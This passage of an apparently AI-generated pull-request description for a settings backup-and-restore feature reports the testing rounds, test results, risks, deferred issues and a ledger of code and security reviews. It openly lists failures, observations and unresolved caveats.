- Backup section: the settings block is part of the "Portable preferences" content option from #3985 (same `preferences.json` file, gated by `includePreferences` on export and restore); that option's description now names the model and agent settings.

## Validation

- Remote dogfood UAT through Coder Agents on two isolated Xum roots: round 1 on `ece81ce2` verified export contents, exclusion of machine-local keys (including a grep of the whole backup repository for locally set marker values), preview/restore/re-preview, older-format and malformed backups, and found the stale-mirror clobber fixed in `116832b0`; round 2 on `116832b0` passed (clobber fix confirmed, cross-tab Models and Runtimes live, machine-local keys smuggled into the block ignored, sanity). Round 3 on the final head `aad7583a` passed every scenario: reset round-trip with the 19-key snapshot and no archive keys in `preferences.json`, clobber and reload, Runtimes live, restored layout preset applied without a reload, unsupported-settings notice (a tampered `thinkingLevel` skipped and named after Preview and after Restore, restore not refused, the valid `defaultModel` next to it applied, local agent defaults untouched), and sanity on both roots. 27 unique screenshots plus the exported `preferences.json` and manifest. Round 4 on `b8b2bc38` passed every scenario (35 unique screenshots): unknown layout preset version and non-object document reported as unsupported with the local slot untouched and still applying, notice cleared by save, preview and backup, unset advisor cap exported as 3 and an explicit unlimited cap as `null` with both applied on the target, layout refresh ordering under rapid restore-and-apply cycles, and the round-3 regression set. The critic noted that the notice stays while a `Back up now` attempt is in flight or fails; that is intended: a failed push does not replace the remote bundle, so the preview and the notice describing it remain accurate and are cleared together on success. Round 5 on the final head `27c72b9b` (27 unique screenshots, adjudicated PASS for the targeted scenarios): V1 corrupt layout shapes (`{"version":2,"slots":"corrupt"}`, `{"version":2,"slots":{"1":{"name":5}}}`) reported as unsupported, restore completes, `layoutPresets` byte-identical before and after, slot 1 still applies; V2 a restore failing after its snapshot (project-memory file flipped read-only at the config rewrite by a timing watcher, a harness contrivance that was deterministic in three attempts) shows the snapshot path in the error, config already holds the restored default and hidden models, and the Models page reflects them live, keeps them when one more model is hidden, and after reload; V4 regression smoke (exec override reset live, 19-key block without archive keys, hidden-model clobber, layout version 3 unsupported, unset advisor cap exported as 3) passed; V5 sanity passed. V3 is an observation, not a pass: the manual control (clearing the default model in the UI) is not reachable because the UI has no way to clear it, and after restoring `defaultModel: null` at one origin a reload of a second origin (`localhost` versus `127.0.0.1`, same backend) re-imported that origin's stale default model into config, which the first origin then showed after its reload; `hiddenModels` was unaffected. Cosmetic, pre-existing: the post-snapshot failure message joins two sentences without punctuation. Evidence under `.mux-uat/round-5/` in the authoring workspace.
- Unit and integration tests: projection inclusion/exclusion and null-means-unset, canonicalization of non-canonical input, wholesale merge semantics, unsupported values skipped and named through preview and restore, the older-build strip guarantee, restore through a real `Config` against a bare origin repository (including a source that reset its settings clearing the target's overrides), mirror re-seeding and clearing (including dirty runtime keys during the startup load), layout refresh ordering (out-of-order responses, a refresh completing after a save, a failed refresh after a successful load, the initial-load fallback).
- `tests/ui/BackupSection.test.ts` passes under its Jest runner (`TEST_INTEGRATION=1 bun x jest tests/ui/BackupSection.test.ts`, 28 pass on `cf75ef35`); the 7 failures reported earlier came from running the suite under `bun test`, which is not its runner.
- On `cf75ef35` (after the merge of `origin/main` and the layout re-read fix): `make typecheck` and `make lint` pass, `bun test src/node/services/backup` 433 pass, `UILayoutsContext`/`WorkspaceContext`/`configMirrors` tests 83 pass; the two new layout tests fail with the fix reverted (0 vs 1 `saveAll` call, 4 vs 3 `getAll` calls) and pass with it.
- On `57b17ac8`: typecheck and lint pass, `bun test src/node/services/backup` 435 pass, context tests 85 pass, Jest `BackupSection` 28 pass; each round-14 fix has a test that fails with the fix reverted (prompt exported; `agentAiDefaults` erased with `unsupported: []`; `saveAll` called once after an exhausted bound; the only `getAll` issued before the subscription armed).

## Risks

- Restore semantics: a key present in the backup replaces the local value wholesale, including `null` resetting it to the default; only a key absent from the block leaves the target untouched. Restores now write into settings other services read at runtime (agent defaults, model fallbacks, task settings); every value passes the on-disk zod schema and the existing save/load normalization, and the safety snapshot taken before a restore also carries the settings block, so the undo path covers them.
- Archive behaviors (`worktreeArchiveBehavior`, `coderWorkspaceArchiveBehavior`) are deliberately not portable: a repository-controlled "delete" would make later archives destructive with no prompt naming the policy. `heartbeatDefaultPrompt` is likewise not portable: a repository-controlled prompt would run unattended in every workspace whose heartbeat has no message of its own.
- `WorkspaceContext` startup seeding moved into the shared helper; the one behavior change is that a backend without a stored default model or hidden list now clears the corresponding mirror instead of leaving a stale value. Dirty-key protection now covers the runtime keys as well as the model keys, so a toggle made during the initial config load survives it.

## Deferred (pre-existing, found during UAT)

Owner: Mike (this note is the follow-up record; issues to be filed on request). Trigger: after this PR merges, or earlier if one of them bites.

- Checksum-mismatch error gives no remediation guidance.
- No undo control for a restore in the UI (the safety snapshot path is reported in the status message).
- Settings sections paint defaults before the config fetch resolves.
- `manifest.json` `sourceLabel` is the exporting root's directory name.
- Post-write verification window ([thread](https://github.com/coder/xum/pull/4229#discussion_r3999024818)). Disposition: the base already ran this exact check for `userPreferences` (edit, then a synchronous `loadConfigOrDefault()` read-back compared through the backup projection); this PR widens the compared set to the settings block, so more writers can in principle trip it. `editConfig` serializes every read-modify-write behind a single permit, so a concurrent edit is derived from the restored config and no restored value is lost; the read-back runs synchronously in the continuation of the same `await`, so a competing edit must complete a file write first, which makes the window practically unreachable. Consequence if hit: a spurious `IO_ERROR` naming the safety snapshot, after which the Backup section re-seeds the mirrors from the backend (`27c72b9b`). Fix: have `editConfig` expose its persisted result so the check binds to the edit.
- Legacy model-preference re-import from another origin ([thread](https://github.com/coder/xum/pull/4229#discussion_r3999024827)). Disposition: `migrateLocalModelPrefsToBackend` is unchanged by this PR; it imports a non-empty localStorage `defaultModel` mirror whenever the backend has none, and a hidden-list mirror while `hiddenModelsInitialized` is false. What this PR adds is one more way to reach the "no default model" state: a restore carrying `defaultModel: null`. The restoring origin is re-seeded and does not re-import; the exposure is a second origin of the same config root (browser mode on another host or port, or Electron plus a browser) that was used while the model was set and loads again afterwards, which then re-imports its stale mirror. UAT round 5 reproduced exactly this (`V3-01`..`V3-03`) and found that the UI offers no way to clear the default model, so a cleared default is reachable only through restore; the pre-existing import condition therefore does not by itself establish that the newly reachable state is safe, and this stays a caveat on the feature until the import is gated (for example on a one-time `migrations` flag like `hiddenModelsInitialized`). A `hiddenModels: null` cannot come from a real source because load-time seeding always materializes an array, and the hidden-list import is gated on `hiddenModelsInitialized`. Fix: a persisted "model preferences initialized" marker that ends legacy re-import.

<details>
<summary>Review ledger (automatic code and security reviews count separately; rounds 7 to 12 were auto-triggered by pushes made on Mike's direct instructions and exceed the six-review ceiling originally set for this PR). CI note: `Test / Unit` on `27c72b9b` failed once in `WorkflowRunner > marks empty workflow returns as failed runs` with the QuickJS WebAssembly trap `Unreachable code should not be executed`, byte-identical to failures of unrelated tests in #3559 (run 27552085157) and #3695 (runs 32914518352, 32991170353); this diff touches no workflow or QuickJS file, the test passes locally, and the rerun passed.</summary>

| #      | Review                                                                                                                                        | Head                             | Outcome                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
| ------ | --------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1      | [Codex code review](https://github.com/coder/xum/pull/4229#issuecomment-5650308121)                                                           | `116832b0`                       | 4 findings: [resets](https://github.com/coder/xum/pull/4229#discussion_r3998453098), [downgrade tolerance](https://github.com/coder/xum/pull/4229#discussion_r3998453100), [layouts](https://github.com/coder/xum/pull/4229#discussion_r3998453102), [canonicalization](https://github.com/coder/xum/pull/4229#discussion_r3998453106); all fixed in `aad7583a`                                                                                                                                                                                 |
| 2      | [Codex security review](https://github.com/coder/xum/pull/4229#issuecomment-5650308121)                                                       | `116832b0`                       | 1 advisory: [archive policies](https://github.com/coder/xum/pull/4229#discussion_r3998460370); fixed by exclusion in `aad7583a`                                                                                                                                                                                                                                                                                                                                                                                                                 |
| 3      | Design advisor consultation (in the authoring chat)                                                                                           | `116832b0`                       | endorsed the fix design                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
| 4, 5   | [Codex code and security reviews](https://github.com/coder/xum/pull/4229#issuecomment-5650308121)                                             | `aad7583a`                       | triggered by marking the draft ready; completed 05:02Z and 05:04Z. Code review: 3 findings, all confirmed: [P1 newer layout preset version wipes local presets](https://github.com/coder/xum/pull/4229#discussion_r3998786858), [P2 refresh race](https://github.com/coder/xum/pull/4229#discussion_r3998786859), [P2 stale notice](https://github.com/coder/xum/pull/4229#discussion_r3998786861). Fixed in `00f1503d`, pushed in `b8b2bc38`. Security review: no new findings. No approval on this head.                                      |
| 6      | Fresh final advisor (clean-context sub-agent: goal, final diff, findings, tests, UAT evidence)                                                | `aad7583a` plus local `00f1503d` | BLOCKER: an unset `advisorMaxUsesPerTurn` exported as `null`, which the advisor reads as unlimited, so a restore from a default source switched the target to unlimited advisor uses; otherwise no blocker once `00f1503d` is pushed. Fixed in `b8b2bc38`, pushed.                                                                                                                                                                                                                                                                              |
| 7, 8   | [Codex code and security reviews](https://github.com/coder/xum/pull/4229#issuecomment-5650308121) (automatic on the push; beyond the ceiling) | `b8b2bc38`                       | completed 07:04Z. Security: no new findings. Code: 4 findings: [layout shape](https://github.com/coder/xum/pull/4229#discussion_r3999024815) fixed in `27c72b9b`; [verification window](https://github.com/coder/xum/pull/4229#discussion_r3999024818) deferred (pre-existing); [mirrors after partial failure](https://github.com/coder/xum/pull/4229#discussion_r3999024821) fixed in `27c72b9b`; [legacy origin re-import](https://github.com/coder/xum/pull/4229#discussion_r3999024827) deferred (pre-existing). No approval on this head. |
| 9, 10  | [Codex code and security reviews](https://github.com/coder/xum/pull/4229#issuecomment-5650308121) (automatic on the push; beyond the ceiling) | `27c72b9b`                       | completed 07:29Z and 07:23Z. Security: no new findings. Code: 3 findings, all confirmed, fixed in `12327c89`: [runtime mirrors at startup](https://github.com/coder/xum/pull/4229#discussion_r3999075494), [mount refresh ordering](https://github.com/coder/xum/pull/4229#discussion_r3999075497), [presets blanked on refresh failure](https://github.com/coder/xum/pull/4229#discussion_r3999075500). No approval on this head.                                                                                                              |
| 11, 12 | [Codex code and security reviews](https://github.com/coder/xum/pull/4229#issuecomment-5650308121) (automatic on the push)                     | `12327c89`                       | completed 16:24Z and 16:25Z. Security: no new findings. Code: 2 findings, both confirmed: [invalidated pre-write layout read](https://github.com/coder/xum/pull/4229#discussion_r4000140077) held for Mike's scope decision; [normalization-rejected values reset the target](https://github.com/coder/xum/pull/4229#discussion_r4000140079) fixed in `4d4f4b20`. Scope decision taken as the bounded re-read, fixed in `cf75ef35`; both pushed after merging `origin/main` (`f0a3076d`). No approval on this head. |
| 13, 14 | [Codex code and security reviews](https://github.com/coder/xum/pull/4229#issuecomment-5650308121) (automatic on the push)                     | `cf75ef35`                       | completed 19:39Z and 19:42Z. Security: 1 advisory (High), [heartbeat prompt restorable](https://github.com/coder/xum/pull/4229#discussion_r4030056423), fixed by exclusion in `31a18f16`. Code: 3 findings, all confirmed: [nested agent model strings](https://github.com/coder/xum/pull/4229#discussion_r4030081852) fixed in `13ce47f3`; [exhausted re-read returns an overtaken read](https://github.com/coder/xum/pull/4229#discussion_r4030081858) fixed in `e64d1467`; [subscribe before the first snapshot](https://github.com/coder/xum/pull/4229#discussion_r4030081865) fixed in `524ed190`. No approval on this head. |
| 15, 16 | [Codex code and security reviews](https://github.com/coder/xum/pull/4229#issuecomment-5650308121) (automatic on the push)                     | `57b17ac8`                       | completed 20:14Z: code review clean (👍), security review no new findings. The `Codex Comments` CI job raced the reviews and failed on the still-running envelope. |
| 17     | [Codex security review](https://github.com/coder/xum/pull/4229#issuecomment-5650308121) (manual `@codex security review`, to refresh the advisory list) | `57b17ac8`                       | completed 20:34Z: earlier advisories marked Resolved; 1 new advisory (Medium), [terminal placeholders in restored layouts](https://github.com/coder/xum/pull/4229#discussion_r4030521992), confirmed and held for Mike's scope decision. |

</details>

---

_Generated with `xum` • Model: `anthropic:claude-fable-5-1` • Thinking: `xhigh` • Cost: `$237.54`_

<!-- mux-attribution: model=anthropic:claude-fable-5-1 thinking=xhigh costs=237.54 -->

